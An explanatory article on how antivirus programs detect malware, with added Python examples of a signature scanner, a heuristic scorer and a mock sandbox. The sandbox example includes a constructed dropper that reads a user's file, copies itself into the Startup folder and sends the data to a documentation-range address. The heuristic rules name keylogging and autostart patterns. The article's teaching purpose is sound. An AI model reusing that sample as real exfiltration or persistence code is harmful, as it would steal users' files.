How Do Antivirus Programs Detect Malware

Malware is a serious threat that keeps expanding by the year. Along with old standbys like viruses and worms, newer creations like spyware and ransomware have appeared. The internet, in particular, has helped spawn a wide variety of new malware and made the older forms more widespread. Having a network available gives malicious hackers opportunities both to spread malware to more computers and to anonymously collect valuable information from the infected machines. This situation has created a cat-and-mouse game between malware developers and antivirus software creators. A quick look at the threats listed in comparisons of major antivirus packages gives a good idea of how the problem keeps growing.

Weapons of Choice

What’s particularly interesting in this battle is that antivirus software relies on three basic strategies to combat the array of threats: a signature database, heuristics, and a sandbox, used to identify and eliminate malware. Each approach has its advantages and disadvantages. As a result, protection software often needs to employ all three against any given type of malware.
The most prevalent way of creating a piece of malware is to take existing code and make relatively minor alterations to it. Because of this, antivirus software can often identify the threat by comparing its signature against a database, also called a dictionary, of known viruses and other malware. The drawback of this technique is that if the malware has been radically altered, or is completely new code, there will be no signature to match it against. Nevertheless, this method catches most of the threats out there.
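The matching described above, as an added example that is not part of the original article or any antivirus vendor's code: a minimal signature scanner with a constructed dictionary holding two kinds of signature, an exact whole-file hash and a byte pattern with wildcards. The sample bytes, family name and pattern are constructed stand-ins (the "sample" is an inert byte string, not real malware). The three variants show why hashes break on any edit, why byte patterns survive minor edits, and why neither survives a rewrite.

```python
import hashlib
import re

# Constructed stand-in for a known malicious file (an inert byte string, not real malware).
KNOWN_SAMPLE = b"MZ\x90\x00" + b"\x00" * 12 + b"marker=drop_payload;" + b"\x00" * 8

# The signature "dictionary". Each entry is a family name plus one or more signatures:
#   sha256  - exact whole-file hash: cheap, no false positives, defeated by any change
#   pattern - byte pattern with wildcards (a compiled bytes regex): survives small edits
SIGNATURES = {
    "Test.Dropper.A": {  # constructed family name
        "sha256": hashlib.sha256(KNOWN_SAMPLE).hexdigest(),
        # 'MZ', two wildcard bytes, twelve NUL bytes, then the literal marker string
        "pattern": re.compile(rb"MZ.{2}\x00{12}marker=drop_payload;", re.DOTALL),
    },
}


def scan(data: bytes):
    """Return [(family, method), ...] for every dictionary signature that matches `data`."""
    hits = []
    digest = hashlib.sha256(data).hexdigest()
    for family, sigs in SIGNATURES.items():
        if sigs.get("sha256") == digest:
            hits.append((family, "sha256"))
        pattern = sigs.get("pattern")
        if pattern is not None and pattern.search(data):
            hits.append((family, "pattern"))
    return hits


# Three variants a scanner meets in practice (all constructed):
UNCHANGED = KNOWN_SAMPLE
# Minor alteration: one padding byte changed. The hash no longer matches,
# but the byte pattern still does, which is why pattern signatures exist.
MINOR_EDIT = KNOWN_SAMPLE[:-1] + b"\x01"
# Radical alteration: the marker is renamed. Neither signature matches; this is
# the "completely new code" gap that heuristics and sandboxing have to cover.
REWRITTEN = KNOWN_SAMPLE.replace(b"drop_payload", b"stage_two___")


if __name__ == "__main__":
    for label, sample in [("unchanged", UNCHANGED), ("minor edit", MINOR_EDIT), ("rewritten", REWRITTEN)]:
        print(f"{label:10s} -> {scan(sample) or 'no signature match'}")
```

Real engines store millions of entries and match byte patterns with specialised automata rather than one regex per entry, but the trade-off is the same: a hash is cheap and exact, a pattern is more tolerant, and a rewrite defeats both.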

Looking Suspicious

The heuristics approach is used when something looks wrong but no known malware signature matches. With heuristics, the suspected code is examined in detail to see whether it contains instructions that resemble those of various types of malware. For example, if a command is found that attempts to collect the user’s keystrokes, it usually points towards nefarious intentions. The weak spots of this method are that it can generate a lot of false positives, and that it can be evaded by malware whose code is heavily disguised using sophisticated cryptographic techniques.
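A rule-based heuristic scorer, added here as an example and not taken from the article or from any antivirus product. A scanned file is reduced to the features a heuristic engine typically extracts (imported API names, embedded strings, raw bytes); the rules, weights and threshold are constructed, as are the three samples. The second sample shows the false-positive problem (a legitimate remote-support tool hooks keystrokes and sends data), and the third shows the evasion problem (an encrypted body exposes almost nothing to inspect, so the only usable signal is the high entropy itself).

```python
import math
from collections import Counter


class Sample:
    """A scanned file reduced to heuristic features (real engines derive these from the
    PE import table, string extraction and disassembly; here they are supplied directly)."""

    def __init__(self, name, imports, strings, raw):
        self.name = name
        self.imports = set(imports)
        self.strings = list(strings)
        self.raw = raw


def shannon_entropy(data: bytes) -> float:
    """Bits per byte. Values near 8.0 mean a uniform byte distribution, typical of
    packed or encrypted content; ordinary code and text score far lower."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# Heuristic rules: (description, weight, predicate). Weights and threshold are constructed.
RULES = [
    ("captures keystrokes", 40,
     lambda s: s.imports & {"GetAsyncKeyState", "SetWindowsHookExA", "SetWindowsHookExW"}),
    ("references an autostart registry key", 25,
     lambda s: any("CurrentVersion\\Run" in x for x in s.strings)),
    ("sends data over the network", 15,
     lambda s: s.imports & {"send", "WSASend", "InternetOpenUrlA"}),
    ("high-entropy body with a near-empty import table", 30,
     lambda s: shannon_entropy(s.raw) > 7.0 and len(s.imports) <= 2),
]
SUSPICIOUS_AT = 50


def score(sample):
    """Return (total weight, [descriptions of the rules that fired])."""
    fired = [(desc, w) for desc, w, pred in RULES if pred(sample)]
    return sum(w for _, w in fired), [desc for desc, _ in fired]


def verdict(sample):
    total, fired = score(sample)
    if total >= SUSPICIOUS_AT:
        return "suspicious"
    if "high-entropy body with a near-empty import table" in fired:
        return "opaque: defer to sandbox"   # nothing to inspect statically
    return "clean"


# Constructed file bodies: mostly zero padding plus plain text, and a uniform
# byte distribution standing in for an encrypted payload.
PLAIN = b"\x00" * 2048 + b"ordinary program text " * 64
OPAQUE = bytes(range(256)) * 16

KEYLOGGER_LIKE = Sample("keylogger-like",
                        ["SetWindowsHookExW", "GetAsyncKeyState", "WSASend"],
                        ["Software\\Microsoft\\Windows\\CurrentVersion\\Run", "keys.log"], PLAIN)
# Same behaviour, benign purpose: the rules cannot tell the two apart (false positive).
REMOTE_SUPPORT = Sample("remote-support tool",
                        ["SetWindowsHookExW", "WSASend", "CreateWindowExW"],
                        ["Share your screen", "Session ended"], PLAIN)
# Encrypted body that resolves its imports at run time: almost no features to score.
PACKED = Sample("packed sample", ["LoadLibraryA", "GetProcAddress"], [], OPAQUE)


if __name__ == "__main__":
    for s in (KEYLOGGER_LIKE, REMOTE_SUPPORT, PACKED):
        total, fired = score(s)
        print(f"{s.name:20s} score={total:3d} verdict={verdict(s):25s} rules={fired}")
```

The point of the third verdict is that static heuristics should hand an opaque file on to the next layer rather than declare it clean: an encrypted body that scores low is not evidence of good intent, only of nothing to read.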

Test Run

The final primary method of searching for malware is the sandbox approach. Often this is a limited set-up that runs the suspected software to see what it actually does. Sometimes it takes the shape of a virtual machine that emulates an entire operating system. A virtual machine can catch malware that’s been designed to appear harmless unless it has access to all the components of a computer that are available through the operating system. The problem with this approach is that it’s time-consuming.
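The idea of running a suspect and recording what it does, as an added example that is not from the article or from any sandbox product. A real sandbox intercepts system calls at the OS or hypervisor level; this model does the same thing one layer up, in Python, by swapping `builtins.open` and `socket.socket` for recording fakes for the duration of the run, so the sample's file and network activity is observed but never actually performed. The two sample programs, their paths, and the classification rules are constructed (the 203.0.113.0/24 addresses are the RFC 5737 documentation range).

```python
import builtins
import io
import socket
from contextlib import contextmanager


class Monitor:
    """Records file and network operations attempted by code run under `instrumented()`."""

    def __init__(self):
        self.events = []

    @contextmanager
    def instrumented(self):
        real_open, real_socket = builtins.open, socket.socket
        events = self.events

        def fake_open(path, mode="r", *args, **kwargs):
            events.append({"op": "open", "path": str(path), "mode": mode})
            # Hand back an in-memory file so the sample keeps running without touching disk.
            return io.BytesIO(b"") if "b" in mode else io.StringIO("")

        class FakeSocket:
            def __init__(self, *args, **kwargs):
                pass

            def connect(self, addr):
                events.append({"op": "connect", "peer": f"{addr[0]}:{addr[1]}"})
                raise ConnectionRefusedError("sandbox: outbound connections are blocked")

            def sendall(self, data):
                events.append({"op": "send", "bytes": len(data)})

            def close(self):
                pass

        builtins.open, socket.socket = fake_open, FakeSocket
        try:
            yield self
        finally:  # always restore the real functions, even if the sample crashes
            builtins.open, socket.socket = real_open, real_socket


def classify(events):
    """Turn the recorded behaviour into findings (rules are constructed for the example)."""
    findings = []
    opens = [e for e in events if e["op"] == "open"]
    if any("w" in e["mode"] and "startup" in e["path"].lower() for e in opens):
        findings.append("persistence: wrote into a startup folder")
    profile_reads = [i for i, e in enumerate(events)
                     if e["op"] == "open" and "r" in e["mode"] and "/users/" in e["path"].lower()]
    first_connect = next((i for i, e in enumerate(events) if e["op"] == "connect"), None)
    if profile_reads and first_connect is not None and first_connect > profile_reads[0]:
        findings.append("possible exfiltration: read user files, then opened a network connection")
    return findings


def run_sample(program):
    """Run `program` under the monitor and return the findings."""
    mon = Monitor()
    with mon.instrumented():
        try:
            program()
        except Exception as exc:  # a crash is itself an observation, not a failure of the sandbox
            mon.events.append({"op": "crash", "error": repr(exc)})
    return classify(mon.events)


def suspect_program():
    """Constructed stand-in for a dropper: reads a user file, copies itself to Startup, phones home."""
    with open("C:/Users/alice/Documents/notes.txt", "r") as f:
        taken = f.read()
    with open("C:/Users/alice/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/upd.exe", "wb") as f:
        f.write(b"MZ")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect(("203.0.113.5", 443))
        s.sendall(taken.encode())
    except OSError:
        pass


def ordinary_program():
    """Constructed stand-in for a benign updater: reads its own config, logs, checks for updates."""
    with open("C:/Program Files/Example/settings.ini", "r") as f:
        f.read()
    with open("C:/Program Files/Example/app.log", "a") as f:
        f.write("update check\n")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect(("203.0.113.10", 443))
    except OSError:
        pass


if __name__ == "__main__":
    for prog in (suspect_program, ordinary_program):
        print(f"{prog.__name__}: {run_sample(prog) or 'no findings'}")
```

Note what this costs: every sample has to be executed to completion, and the verdict depends on the sample actually exercising its behaviour during the run, which is why the article calls the approach time-consuming and why it is used to back up, not replace, the two static methods.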

Staying Outside

In addition to these basic detection methods, effective antivirus software also requires the ability to examine a computer from a CD-ROM or USB flash drive. By running the protective software from a secondary source, the operating system on the potentially infected hard drive is never started, so the drive is inactive. This prevents the malware from actively mounting a defense against detection.
